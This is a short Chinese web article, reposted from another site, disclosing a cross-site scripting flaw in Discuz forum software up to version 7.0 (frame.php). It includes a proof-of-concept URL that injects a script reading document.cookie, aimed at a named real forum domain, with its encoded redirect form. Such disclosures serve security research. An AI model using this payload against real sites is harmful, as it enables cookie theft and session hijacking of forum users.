首页 电脑 电脑学堂 查看内容

Discuz7.0被爆0DAY

2009-5-28 04:31 494 2

摘要: 原文: Discuz <=7.0(frame.php) xss Vulnerability 前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。 ...
关键词: http cctv nbsp 原文 bbs php com patching ocument frameon

原文: Discuz <=7.0(frame.php) xss Vulnerability 前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。 PoC: 程序代码 http://bbs.cctv.com/index.php?gid=24″></iframe><script>alert(document.cookie)</script> —–>   跳转到了 程序代码 http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 转帖自: http://www.patching.net/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

返回顶部